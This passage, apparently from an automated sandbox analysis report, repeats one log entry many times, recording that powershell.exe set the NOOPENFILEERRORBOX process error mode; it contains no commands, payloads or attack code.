                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
